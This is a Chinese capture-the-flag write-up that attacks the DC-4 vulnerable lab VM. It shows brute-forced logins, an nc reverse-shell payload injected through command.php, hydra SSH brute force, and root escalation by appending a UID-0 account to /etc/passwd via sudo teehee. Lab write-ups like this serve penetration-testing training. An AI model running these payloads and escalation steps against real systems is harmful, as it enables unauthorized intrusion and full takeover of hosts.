DC-4
DC-4 DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。
与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。 只有一面旗帜,但技术上来说,有多个入口,就像上次一样,没有线索。
环境
DC-4 192.168.236.142
kali 192.168.236.133
信息收集
nmap直接扫一下吧。
nmap -A -p - 192.168.236.142
可以看到开了80 / tcp http 22 / tcp ssh。打开80端口看看。
但是没有登录限制,尝试爆破爆破一下吧。
burp或者hyda爆破吧,这里使用burp suite爆破吧。
爆破出来账号是admin密码happy。登陆看看。
看看commd中有几个命令。分别执行看看。
看到这里就要知道了可能存在任意远程命令执行中断。brup抓一下包吧。
看看数据包。
POST /command.php HTTP/1.1
Host: 192.168.236.142
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.236.142/command.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Connection: close
Cookie: PHPSESSID=f4usv4i3pnifd66g1pg34l5830
Upgrade-Insecure-Requests: 1
radio=ls+-l&submit=Run注意看radio = ls + -l,好的。
whoami命令看看。
可以执行。并返回数据。我们可以反弹个shell吧。
kali中 nc -lvvp 1234 监听7777端口,接收反弹回来的shell。
radio=nc +-e +/bin/sh 192.168.236.133a +1234 &submit=Run
ok,shell回来了。我们使用python来开一个标准的shell吧。
为什么是python?因为所有的Linux中基本都会有python。
python -c 'import pty;pty.spawn("/bin/bash")'
拿到一个标准的shell。信息收集一波。
翻来覆去,在/ home / jim中找到一份密码。
来吧,我们使用hyda来爆破jim的ssh登录密码吧。
hydra -l jim -P /home/l/桌面/123.txt ssh://192.168.236.143
爆破出来了。jim的密码是jibril04。
成功登录上去jim。
ls -l看看
是要提权的。
You have new mail in /var/mail/jim 你有一个新的邮件在我们去看看是什么嘛。
su到查尔斯拿到一查尔斯账号的密码^ xHhA&hvim0y。
成功登录到charles账号。
信息收集一波发现可以免密码使用sudo / usr / bin / teehee
cd / usr / bin然后teehee --help看看。
ok。有想法了。我们就使用teehee -a把一个账号写进到/ etc / passwd上,这个用户拥有root权限,然后在切换到这个用户即可。
echo 命令与 sudo 命令配合使用,可以实现向那些只有系统管理员才有权限操作的文件中写入信息
[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]ok构建命令admin:123456:0:0:123::/bin/sh gid:0就是root然后登录shell是/ bin / sh。
最后语句是
echo "admin:123:0:0:123::/bin/bash" | sudo teehee -a /etc/passwd
我们看看登录一下admin吧.ok拿到flag
88 dc-5见。